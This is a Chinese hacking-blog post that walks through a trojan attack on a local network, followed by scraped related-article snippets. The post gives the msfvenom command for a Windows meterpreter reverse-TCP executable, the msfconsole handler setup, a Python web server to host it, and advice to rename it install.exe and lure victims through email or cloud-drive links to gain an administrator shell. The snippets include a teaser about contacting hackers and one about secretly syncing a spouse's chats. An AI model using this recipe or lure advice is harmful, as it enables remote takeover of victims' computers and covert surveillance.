基于局域网渗透攻击之木马攻击

访客4年前黑客文章1028

使用kali生成木马文件,创建一个简易的web服务器,将木马文件伪装成install.exe类型的安装文件,诱使被攻击者点击木马文件,从而getshell。

准备环境

攻击机(kali):192.168.29.130

被攻击机(window server 2008 SP2):192.168.29.135

1、攻击机(kali)使用msfvenom 生成 payloadmsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.29.130 LPORT=4444 -f exe > /xx.exe2.kali攻击机打开msfconsoleuse exploit/multi/handler? //使用攻击模块set payload windows/meterpreter/reverse_tcp? //设置攻击载荷,建立反弹连接set LHOST 192.168.29.130 //设置源IP(攻击机IP)set LPORT 4444? //设置源端口(攻击机未被占用端口)show options ? //查看配置选项(选填,可查看未配置选项)3.实施攻击操作4.kali攻击机将木马文件拷贝到指定目录5.在该目录下面搭建一个简易的web服务器。命令:python -m SimpleHTTPServer 806.查看被攻击者的IP地址详情

7.被攻击者访问链接http://192.168.29.130/如下图,访问http://192.168.29.130/xx.exe即可直接下载木马文件(可以将URL放在邮件中发送给攻击者,或者放在网盘中添加指定内容诱使被攻击者点击,并且将exe文件名称修改为install.exe等类似安装文件进行伪装)8.被攻击者将木马文件下载到本地9.被攻击者双击木马文件后,攻击机kali得到一个会话,并且是更高administrator权限原文链接

相关文章

表格斜线一分为二怎么打字(excel斜杠分割表格打字)

表格斜线一分为二怎么打字(excel斜杠分割表格打字) 在梳理报表的情况下,坚信很多盆友都是会牵涉到表格斜线的制做。例如单斜杠和双斜杠来区别不一样层面新项目。下边大家就来学习培训一下,怎样根据Exc...

新三板财经媒体官方网站分析平台(新三板参考

中国江西网讯 记者曹琦、实习生张婷婷报道:随着新三板市场活跃度的提高,传媒板块也跟着水涨船高。中国江西网财经记者发现,截至9月6日,全国新三板11557家公司中,传媒板块共838家,占比7.2%。近年...

lol云顶之弈10.9海盗阵容怎么玩 新版最强阵容海盗永动机玩法教学

lol云顶之弈10.9海盗阵容怎么玩 新版最强阵容海盗永动机玩法教学

云顶之弈10.9海盗阵容怎么搭配?新版本海盗阵容怎么玩?当前版本中“海盗永动机”这个套路用来上分是比较稳定的,吃鸡率也很不错。下面带来云顶之弈10.9新版最强阵容海盗永动机攻略,感兴趣的棋友们一起看看...

哪里有黑客联系方式「真正的黑客在哪里可以联系到」

⒈哪儿能找到黑客的联系方式百度搜索 工作经验搜百度一个百度搜索引擎你能找到黑客联系方式但绝大多数是多少全是碰到的大广告宣传的说我了解一个这类的这类是什么你应该清晰。找到社区论坛这些id里边公布文章内容...

黑莓涉嫌泄露用户密钥 黑莓涉嫌泄露用户隐私拒绝回应

  黑莓因涉嫌泄漏客户密匙 黑莓因涉嫌泄漏客户隐私保护回绝回复。4月19日信息,据外国媒体engadget报导,黑莓企业CEO周一在Twitter上回复了澳大利亚警察开启超出一百万部黑莓手机的数据加密...

同步老公聊天记录_同步老公的微信道德吗

同步老公聊天记录_同步老公的微信道德吗 windows10登录密码取消怎么操作?众所周知,win10设置登录密码是为了提高电脑的安全性,电脑里面保存着重要资料的朋友,一般都会设置,当然有也朋友觉...